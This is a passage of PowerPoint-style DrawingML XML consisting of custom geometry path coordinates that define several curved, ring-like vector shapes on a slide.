                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227586" y="303178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214044" y="254001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202406" y="204232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192708" y="153910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1184989" y="103071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1179287" y="51755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1175639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886956" y="4655820"/>
              <a:ext cx="2421890" cy="2110740"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2421890" h="2110740">
                  <a:moveTo>
                    <a:pt x="2258328" y="605027"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256765" y="606862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303097" y="612275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348283" y="621129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392191" y="633288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434687" y="648614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1475638" y="666971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514912" y="688222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552375" y="712230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587893" y="738858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1621335" y="767970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652567" y="799429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681456" y="833097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707869" y="868839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731673" y="906516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752734" y="945993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1770921" y="987132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786099" y="1029797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798135" y="1073851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806898" y="1119156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1812253" y="1165577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814068" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811704" y="1266822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1804736" y="1319423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793348" y="1370569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777723" y="1420050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1758046" y="1467656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1734500" y="1513176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707269" y="1556401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676538" y="1597121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642491" y="1635124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627727" y="1650325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598199" y="1681773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583436" y="1696973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027936" y="2110740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2040530" y="2096456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2053161" y="2082958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065815" y="2069984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078482" y="2057272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078482" y="2054478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111127" y="2019580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142417" y="1983375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172304" y="1945909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200743" y="1907230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2227685" y="1867384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2253086" y="1826417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276897" y="1784375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299071" y="1741306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319681" y="1696973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338419" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2355312" y="1606394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370474" y="1559677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383767" y="1512164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2395143" y="1463902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404556" y="1414937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411978" y="1365128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417309" y="1314997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420545" y="1264289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421636" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420673" y="1164199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417809" y="1115910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413080" y="1068145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406523" y="1020940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398173" y="974333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388066" y="928359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376240" y="883055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362730" y="838456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2347572" y="794600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330803" y="751522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2312459" y="709258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292576" y="667845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271191" y="627319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258328" y="605027"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2421890" h="2110740">
                  <a:moveTo>
                    <a:pt x="1209421" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1160676" y="963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112429" y="3829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064715" y="8561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017570" y="15123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971030" y="23479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925131" y="33592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879909" y="45426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835398" y="58946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791635" y="74114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748656" y="90894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706497" y="109251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665192" y="129147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624778" y="150547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585291" y="173414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546766" y="197713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509239" y="223406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472746" y="250458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437323" y="278832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403005" y="308492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369828" y="339402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337828" y="371525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307040" y="404825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277501" y="439267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249246" y="474813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222310" y="511428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196730" y="549074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172541" y="587717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149780" y="627319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128481" y="667845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108680" y="709258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90414" y="751522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="794600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58627" y="838456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45178" y="883055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33407" y="928359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23348" y="974333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="1020940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8512" y="1068145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3807" y="1115910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="1164199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047" y="1264289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4168" y="1315084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9330" y="1365315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16441" y="1414617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25535" y="1463423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36548" y="1511504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49444" y="1558818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64186" y="1605325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80736" y="1650982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99057" y="1695747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119113" y="1739581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140867" y="1782439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164281" y="1824283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189319" y="1865069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215943" y="1904756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244117" y="1943302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273803" y="1980667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304965" y="2016808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337566" y="2051684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337566" y="2054478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371221" y="2088260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798829" y="1657603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793115" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787526" y="1646427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781939" y="1640712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779145" y="1637918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748274" y="1603838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719934" y="1567524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694295" y="1529113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671526" y="1488741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651795" y="1446545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635273" y="1402662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622128" y="1357227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612529" y="1310376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606645" y="1262248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604647" y="1212977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1165577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1119156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1073851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1029797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="987132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="945993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="906516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="868839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="833097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="799429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="767970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="738858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="712230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="688222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="666971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="648614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="633288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="621129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="612275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="606862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258328" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248339" y="587717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224057" y="549074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198381" y="511428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2171347" y="474813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142991" y="439267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113351" y="404825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082461" y="371525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050359" y="339402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017080" y="308492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982661" y="278832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947137" y="250458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910546" y="223406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872923" y="197713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834305" y="173414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794727" y="150547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754227" y="129147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712840" y="109251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670602" y="90894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627550" y="74114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583721" y="58946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539149" y="45426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493872" y="33592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447925" y="23479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401345" y="15123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354169" y="8561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306432" y="3829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258170" y="963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421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171688" y="5942076"/>
              <a:ext cx="2426335" cy="2423160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2426334" h="2423159">
                  <a:moveTo>
                    <a:pt x="1246885" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1243281" y="51755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1237695" y="103071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230142" y="153910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1220639" y="204232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209201" y="254001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195843" y="303178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180582" y="351725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163432" y="399603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144410" y="446775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123531" y="493202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100811" y="538846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076265" y="583669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049908" y="627634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088820" y="618154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1129363" y="611044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170977" y="606577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="605028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260484" y="606844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306852" y="612204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352074" y="620974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396017" y="633022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438548" y="648214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479533" y="666417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518840" y="687498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556334" y="711323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591883" y="737759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625354" y="766673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656613" y="797932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685527" y="831403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711963" y="866952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735788" y="904446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756869" y="943753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1775072" y="984738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790264" y="1027269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802312" y="1071212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811082" y="1116434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816442" y="1162802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818258" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816442" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811082" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802312" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790264" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1775072" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756869" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735788" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711963" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685527" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1656613" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625354" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591883" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556334" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518840" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479533" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438548" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396017" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352074" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306852" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260484" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="1815211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165723" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119355" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074133" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030190" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987659" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946674" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907367" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869873" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834324" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800853" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="769594" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740680" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714244" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690419" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669338" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651135" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635943" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623895" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615125" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609765" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607948" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610291" y="1156001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617186" y="1103296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628435" y="1052234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643842" y="1002982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663207" y="955706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686333" y="910574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713022" y="867751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743076" y="827405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298322" y="413766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266303" y="452171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235852" y="491873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207019" y="532824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179851" y="574974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154396" y="618276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130702" y="662682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108817" y="708143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88788" y="754611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70665" y="802038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54494" y="850376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40324" y="899575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28202" y="949589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18177" y="1000369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296" y="1051867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4608" y="1104034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160" y="1156822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3829" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8561" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15123" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23479" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33592" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45427" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58947" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74115" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90896" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109253" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129150" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150551" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173419" y="1835442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197719" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223413" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250467" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278842" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308504" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339416" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371542" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404845" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439289" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474838" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511456" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
